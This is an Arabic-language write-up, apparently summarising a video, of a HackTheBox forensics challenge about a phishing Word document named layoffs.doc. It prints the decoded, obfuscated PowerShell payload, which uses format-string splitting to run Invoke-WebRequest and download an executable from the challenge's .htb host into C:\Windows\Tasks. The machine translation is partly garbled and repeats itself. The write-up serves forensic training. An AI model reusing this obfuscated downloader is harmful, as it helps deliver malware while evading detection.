قمنا بتغطية تحليل نموذج مستند Microsoft Office Word باستخدام أدوات أولية لاستخراج وحدات الماكرو والروابط ذات الصلة. يحتوي نموذج المستند على رابط يشير إلى صفحة ويب تحتوي على كود Javascript. يحتوي رمز JS على أمر Powershell المشفر باستخدام base64 والذي يقوم باستدعاء مجال خارجي لاسترداد ملف قابل للتنفيذ. كان هذا جزءًا من تحدي الطب الشرعي التشخيصي HackTheBox.. كان هذا جزءًا من تشخيص HackTheBox. كان هذا جزءًا من تشخيص HackTheBox.
اختبار الاختراق الكامل مع دورة BackBox
حددت مركز عمليات الأمن (SOC) لدينا العديد من رسائل البريد الإلكتروني التصيدية التي تدعي أن لديها مستندًا حول جولة قادمة من عمليات تسريح العمال في الشركة. تحتوي جميع رسائل البريد الإلكتروني على رابط إلى Diagnostic.htb/layoffs.doc. توقف نظام DNS الخاص بهذا المجال عن الحل منذ ذلك الحين، لكن الخادم لا يزال يستضيف المستند الضار (عامل الإرساء الخاص بك). ألق نظرة واكتشف ما يحدث.
أبرز مقاطع الفيديو
- كنا أوليد وأوليوبج لتحليل مستند Word المسمى Layoff.doc
- يحتوي المستند على رابط خارجي يشير إلى صفحة ويب تحتوي على Javascript
- استخدمنا جدول ASCII لتحويل char[58] وchar[34] إلى ASCII المطابق لهما.
- ثم استخدمنا Cyberchef لتحويل base64 وتم تحويله إلى ما يلي
${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0' ،'E'،'r...s'،'3Ms_b4D'،'l3'،'toC'،'HT'،'0l_h4nD')
&("{1}{2}{0}{3}"-f'ues','Invoc','-WebReq','t') ("{2}{8}{0}{4}{ 6}{5}{3}{1}{7}”-f '://au','.htb/2′,'h','ic','to','agnost','mation. di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"
- استخدمنا بوويرشيل لفك تشفير ما ورد أعلاه في علامة التحدي
تجول الفيديو
